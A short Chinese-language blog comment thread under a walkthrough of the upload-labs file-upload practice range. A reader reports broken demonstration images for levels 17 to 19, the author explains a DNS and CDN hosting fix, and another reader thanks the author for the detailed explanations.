  • 忘了补充了,我参考影风师傅你的靶场攻略笔记,当打到第17关时候,发现影风师傅你的演示过程图片挂了,之后又看了下剩余几关,第18关攻略的演示过程图片挂了,还有第19关的思路1那里的演示图片也挂了,其余关卡的图片还能正常加载,就这三处的图片已经无法加载出来。麻烦师傅重新补下图片链接了(多多捂脸)

    • gif是放在七牛云的,七牛云不知道怎么的,不认百度云加速的dns解析,只好换回了阿里云的dns解析,然后就可以看到啦,然后也只能关闭了百度云cdn加速

  • 抱歉来晚了,影风师傅,最近在学习文件上传,找到upload-labs这个上传靶场来练习,之后我在谷歌上搜这个靶场的通关笔记,找了几个大佬相关这个靶场攻略的博客文章,但经过我仔细比对过后,感觉影风师傅你写的通关攻略很详细,而且有些关卡还附有多种思路来上传文件,看重师傅你的靶场通关文章是因为师傅从代码审计角度出发来分析漏洞产生点,原理讲解清晰明了。(多多感谢师傅)

    • 谢谢你的学习感受分享,不足之处 多多指教